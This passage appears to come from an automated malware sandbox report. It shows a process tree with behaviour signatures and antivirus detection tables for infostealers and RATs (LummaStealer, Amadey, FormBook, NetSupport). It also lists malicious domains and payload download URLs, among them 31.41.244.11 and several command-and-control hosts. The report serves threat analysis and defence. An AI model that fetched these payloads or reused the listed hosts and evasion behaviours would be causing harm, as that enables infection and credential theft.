                                                    signatures: Suspicious powershell command line found; Uses cmd line tools excessively to alter registry or file data; Encrypted powershell cmdline option found; 4 other signatures
                                                    61 powershell.exe
                                                        signatures: Loading BitLocker PowerShell Module
                                                    64 conhost.exe
                                                55 cmd.exe
                                                    signatures: Modifies Windows Defender protection settings; Adds a directory exclusion to Windows Defender
                                                    66 powershell.exe
                                                    77 2 other processes
                                                57 cmd.exe
                                                    68 powershell.exe
                                                        dropped: C:\Users\user\AppData\...\l2sopuet.cmdline, Unicode
                                                        81 csc.exe
                                                            dropped: C:\Users\user\AppData\Local\...\l2sopuet.dll, PE32
                                                            84 cvtres.exe
                                                    71 conhost.exe
                                                59 24 other processes
                                                    signatures: Tries to harvest and steal WLAN passwords
                                                    73 getmac.exe
                                                        signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
                                                    75 powershell.exe
                                                    79 46 other processes
                                                        dropped: C:\Users\user\AppData\Local\Temp\vLqBW.zip, RAR
                                        29 d188864e84.exe
                                            contacts: 172.67.180.113 CLOUDFLARENETUS United States
                                            signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Query firmware table information (likely to detect VMs); 8 other signatures
                                        32 m9sfEU9.exe
                                            dropped: C:\Users\Public\Netstat\remcmdstub.exe, PE32; C:\Users\Public\Netstat\pcicapi.dll, PE32; C:\Users\Public\Netstat\TCCTL32.DLL, PE32; 5 other files (4 malicious)
                                            40 FuturreApp.exe
                                                contacts: 185.215.113.64 WHOLESALECONNECTIONSNL Portugal; 172.67.68.212 CLOUDFLARENETUS United States
                                                signatures: Multi AV Scanner detection for dropped file
                                            42 Conhost.exe
                                        34 2 other processes
                                            signatures: Uses cmd line tools excessively to alter registry or file data; Injects a PE file into a foreign processes; LummaC encrypted strings found
                                            44 8ZVMneG.exe
                                                contacts: 4 other IPs or domains
                                                signatures: Query firmware table information (likely to detect VMs); Tries to steal Crypto Currency Wallets
                                            46 d0ef52de9f.exe
                                                contacts: 104.21.23.76 CLOUDFLARENETUS United States
                                            48 conhost.exe
                                            50 2 other processes
                                16 skotes.exe
                                    signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                18 skotes.exe

                                Source | Detection | Scanner | Label
                                file.exe | 47% | ReversingLabs | Win32.Infostealer.Tinba
                                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                                file.exe | 100% | Joe Sandbox ML |
                                Source | Detection | Scanner | Label
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe | 100% | Avira | TR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe | 100% | Avira | TR/Dropper.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe | 100% | Avira | TR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe | 100% | Avira | HEUR/AGEN.1320706
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exe | 100% | Avira | HEUR/AGEN.1306040
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe | 100% | Avira | TR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Avira | TR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Avira | TR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Avira | TR/Crypt.XPACK.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Avira | TR/ATRAPS.Gen
                                C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | 100% | Avira | HEUR/AGEN.1306040
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\UZAj8wc[1].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[5].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[3].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 100% | Joe Sandbox ML |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 100% | Joe Sandbox ML |
                                C:\Users\Public\Netstat\FuturreApp.exe | 29% | ReversingLabs | Win32.Trojan.NetSupport
                                C:\Users\Public\Netstat\HTCTL32.DLL | 3% | ReversingLabs |
                                C:\Users\Public\Netstat\PCICHEK.DLL | 3% | ReversingLabs |
                                C:\Users\Public\Netstat\PCICL32.DLL | 12% | ReversingLabs |
                                C:\Users\Public\Netstat\TCCTL32.DLL | 3% | ReversingLabs |
                                C:\Users\Public\Netstat\msvcr100.dll | 0% | ReversingLabs |
                                C:\Users\Public\Netstat\pcicapi.dll | 3% | ReversingLabs |
                                C:\Users\Public\Netstat\remcmdstub.exe | 13% | ReversingLabs |
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exe | 53% | ReversingLabs | Win32.PUA.NetSupportRAT
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe | 81% | ReversingLabs | Win32.Trojan.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe | 54% | ReversingLabs | Win32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\8ZVMneG[1].exe | 67% | ReversingLabs | Win32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe | 67% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe | 88% | ReversingLabs | Win32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe | 18% | ReversingLabs | Win32.Dropper.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe | 75% | ReversingLabs | Win32.Trojan.Generic
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe | 54% | ReversingLabs | Win32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exe | 28% | ReversingLabs |
                                C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | 67% | ReversingLabs | Win32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | 53% | ReversingLabs | Win32.PUA.NetSupportRAT
                                C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | 75% | ReversingLabs | Win32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe | 67% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
                                C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe | 54% | ReversingLabs | Win32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe | 88% | ReversingLabs | Win32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe | 28% | ReversingLabs |
                                C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe | 18% | ReversingLabs | Win32.Dropper.Generic
                                C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe | 54% | ReversingLabs | Win32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1017917001\7423465717.exe | 81% | ReversingLabs | Win32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017918001\d2256ee69b.exe | 68% | ReversingLabs | Win32.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1017919001\b8dc7af2d8.exe | 75% | ReversingLabs | Win32.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe | 54% | ReversingLabs | Win32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_bz2.pyd | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_ctypes.pyd | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Temp\_MEI51602\_decimal.pyd | 3% | ReversingLabs |
No Antivirus matches
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | true | |
deafeninggeh.biz | true | |
effecterectz.xyz | true | |
debonairnukk.xyz | true | |
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp | false | |
https://github.com/Blank-c/BlankOBF | D1UL0FG.exe, 00000006.00000003.2479764407.000001FA2E279000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479979296.000001FA2E83D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480587995.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479451301.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479664796.000001FA2E254000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481335811.000001FA2E26A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480317541.000001FA2E251000.00000004.00000020.00020000.00000000.sdmp | false | |
http://%s/testpage.htmwininet.dll | FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | false | |
http://31.41.244.11/files/7781867830/D1UL0FG.exeshqos.dll | skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmp | false | |
https://duckduckgo.com/ac/?q= | 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp | false | |
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | false | |
http://geo.netsupportsoftware.com/location/loca.asp | FuturreApp.exe, 00000055.00000002.7280001721.0000000001011000.00000004.00000020.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp | false | |
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmp | false | |
http://%s/testpage.htm | FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp | false | |
https://www.gstatic.cn/recaptcha/ | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
https://python.org/dev/peps/pep-0263/ | D1UL0FG.exe, 00000006.00000002.3005171596.00007FF8A8E0F000.00000040.00000001.01000000.0000000B.sdmp | false | |
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp | false | |
http://ocsp.sectigor | D1UL0FG.exe, 00000005.00000002.3018342461.0000027326149000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.leboncoin.fr/ | D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECB8000.00000004.00001000.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/x3team/random.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
http://www.valvesoftware.com/legal.htm | 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.youtube.com | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
https://lev-tolstoi.com/apih0Y | 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3045357571.0000000001365000.00000004.00000020.00020000.00000000.sdmp | false | |
https://api.anonfiles.com/upload | D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp | false | |
https://api.libertyreserve.com/beta/xml/transfer.aspx | skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.msn.com | D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ED50000.00000004.00001000.00020000.00000000.sdmp | false | |
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.2798190076.0000028A95663000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA472A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2733086227.0000021FA45E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://discord.com/api/v9/users/ | D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp | false | |
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://deafeninggeh.biz/e | 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmp | false | |
https://diffuculttan.xyz/api | 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp | false | |
https://pancakedipyps.click/. | d0ef52de9f.exe, 0000005F.00000003.2934892594.00000000012D6000.00000004.00000020.00020000.00000000.sdmp | false | |
https://s.ytimg.com; | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000011.00000002.2659507683.0000028A855F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2645286273.0000021F94571000.00000004.00000800.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmp | false | |
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmp | false | |
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | D1UL0FG.exe, 00000006.00000002.2997186323.000001FA2E940000.00000004.00001000.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/1293295511/UZAj8wc.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp | false | |
https://lev-tolstoi.com/rtner.-K | 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp | false | |
https://steamcommunity.com/profiles/76561199724331900 | 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp | false | |
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en | 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/karl/random.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmp | false | |
https://wrathful-jammy.cyou/ | 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp | false | |
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.amazon.com/ | D1UL0FG.exe, 00000006.00000002.2997655266.000001FA2EC50000.00000004.00001000.00020000.00000000.sdmp | false | |
https://contoso.com/Icon | powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmp | false | |
https://pancakedipyps.click/apiP | d0ef52de9f.exe, 0000005F.00000003.3051592972.00000000012CC000.00000004.00000020.00020000.00000000.sdmp | false | |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp | false | |
https://httpbin.org/ | D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmp | false | |
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp | false | |
http://ocsp.rootca1.amazontrust.com0: | 8ZVMneG.exe, 00000054.00000003.2883846123.0000000003C00000.00000004.00000800.00020000.00000000.sdmp | false | |
http://www.cl.cam.ac.uk/~mgk25/iso-time.html | D1UL0FG.exe, 00000006.00000003.2483191115.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp | false | |
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module | D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp | false | |
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches | D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmp | false | |
http://127.0.0.1 | m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp | false | |
https://immureprech.biz/api | 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.ecosia.org/newtab/ | 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp | false | |
http://www.symauth.com/cps0( | m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmp | false | |
https://immureprech.biz/apif | 8ZVMneG.exe, 00000054.00000003.2800061103.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.00000000012D3000.00000004.00000020.00020000.00000000.sdmp | false | |
https://lv.queniujq.cn | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
https://steamcommunity.com/profiles/76561199724331900/inventory/ | 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmp | false | |
https://www.youtube.com/ | 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp | false | |
http://31.41.244.11/files/martin/random.exe | skotes.exe, 00000003.00000002.7284592983.0000000001325000.00000004.00000020.00020000.00000000.sdmp | false | |
https://github.com/Pester/Pester | powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmp | false | |
